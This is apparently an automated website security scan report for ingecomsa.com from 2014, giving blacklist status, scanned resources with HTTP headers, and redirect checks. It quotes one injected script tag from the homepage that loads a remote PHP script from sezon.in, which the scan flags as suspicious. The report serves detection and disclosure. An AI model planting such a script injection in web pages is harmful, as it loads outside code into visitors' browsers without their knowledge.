Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ingecomsa.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ingecomsa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ingecomsa.com/ | 200 OK Content-Length: 2051 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://sezon.in/prpx34vy.php?id=14140444"></script>
http://sezon.in/prpx34vy.php?id=14140451 | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:45 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22c5d8f45ead01f17e9cf17f78e099faf6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022025%22%3B%7D58802a7020cf737b7f5dff67615d6379; expires=Thu, 18-Sep-2014 08:33:45 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/ | 200 OK Content-Length: 300525 Content-Type: text/html | clean |
http://sezon.in/js/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://sezon.in/js/chosen.jquery.js | 200 OK Content-Length: 38563 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.js | 200 OK Content-Length: 120763 Content-Type: application/x-javascript | clean |
http://sezon.in//api-maps.yandex.ru/2.0/?load=package.full&mode=debug&lang=ru-RU/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 06:33:49 GMT Location: http://sezon.in/api-maps.yandex.ru/2.0?load=package.full&mode=debug&lang=ru-RU/ Server: nginx/1.6.1 Content-Length: 355 Content-Type: text/html; charset=iso-8859-1 | clean |
http://sezon.in/api-maps.yandex.ru/2.0?load=package.full&mode=debug&lang=ru-ru/ | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:49 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%222bab3dbd6fce478384655e974919d5a2%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022029%22%3B%7D8af8e1f04b67c55bb4378d4aa9c5258d; expires=Thu, 18-Sep-2014 08:33:49 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/test404page.js | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:50 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bcaa00fcf43fc971249a6a56c3cdc706%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022030%22%3B%7D7e0ff90f49bcb83dadddb675aae6cf7b; expires=Thu, 18-Sep-2014 08:33:50 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/js/system_central.js | 200 OK Content-Length: 73 Content-Type: application/x-javascript | clean |
http://sezon.in/dontload/jqtransformplugin/jquery.jqtransform.js | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Sep 2014 06:33:50 GMT Server: nginx/1.6.1 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a5cc6dbb0445b88a6f6fe00cd8a44d25%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221411022030%22%3B%7Dc264c766db5cfd97c7379f4c924b08ec; expires=Thu, 18-Sep-2014 08:33:50 GMT; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://sezon.in/js/logic.js | 200 OK Content-Length: 1959 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.lightbox.js | 200 OK Content-Length: 20096 Content-Type: application/x-javascript | clean |
http://sezon.in/js/iepngfix_bgr.js | 200 OK Content-Length: 4275 Content-Type: application/x-javascript | clean |
http://sezon.in/js/jquery.jscrollpane.min.js | 200 OK Content-Length: 14114 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ingecomsa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Sep 2014 06:23:28 GMT
Pragma: no-cache
Server: Apache
Content-Language: fr
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1ksd2btlu5n229lbtab5fqhuj6; path=/
X-Powered-By: PHP/5.2.6-1+lenny9
Second query (visit from search engine):
GET / HTTP/1.1
Host: ingecomsa.com
Referer: http://www.google.com/search?q=ingecomsa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.